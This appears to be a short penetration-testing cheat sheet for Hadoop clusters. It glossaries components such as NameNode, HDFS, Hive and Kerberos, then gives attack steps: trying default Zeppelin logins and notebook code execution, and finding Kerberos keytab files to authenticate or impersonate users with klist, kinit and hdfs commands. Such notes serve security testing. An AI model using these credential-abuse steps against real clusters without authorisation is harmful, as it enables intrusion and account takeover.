2.0 KiB
Hadoop
Distributed storage and computing
Terminology
-
Cluster, forms the datalake
-
Node, single host inside the cluster
-
NameNode, node that keeps the dir tree of the Hadoop file system
-
DataNode, slave node that stores files and is instructed by the NameNode
-
Primary NameNode, current active node responsible for keeping the directory structure
-
Secondary NameNode, hot standby for Primary NameNode. There may be multiple on standby inside the cluster
-
Master Node, Hadoop management app like HDFS or YARN Manager
-
Slave Node, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time
-
Edge Node, hosting Hadoop user app like Zeppelin or Hue
-
Kerberised, security enabled cluster through Kerberos
-
HDFS, Hadoop Distributed File System, storage device for unstructured data
-
Hive, primary DB for structured data
-
YARN, scheduling jobs and resource management
-
MapReduce, distributed filtering, sorting and reducing
-
HUE, GUI for HDFS and Hive
-
Zookeeper, cluster management
-
Kafka, message broker
-
Ranger, privileged ACL
-
Zeppelin, data analytivs inside a webUI
Zeppelin
- Try default logins
- Try execution inside notebooks
Ktabs
- Finding
ktpass
es to authenticate at the kerberos TGS - Output principals and use them to init
klist -k <keytabfile>
kinit <prinicpal name> -k -V -t <keytabfile>
HDFS
- User the
hdfs
utility to enumerate the distributed network storage
hdfs dfs -ls /
- Current user and user on the storage do not have to correspond
- Touched files on the storage may be owned by root
hdfs dfs -touchz testfile /tmp/testfile
hdfs dfs -ls /tmp
- Impersonate by sourcing keytab file of the user, NodeManager is the highest user in regards to permission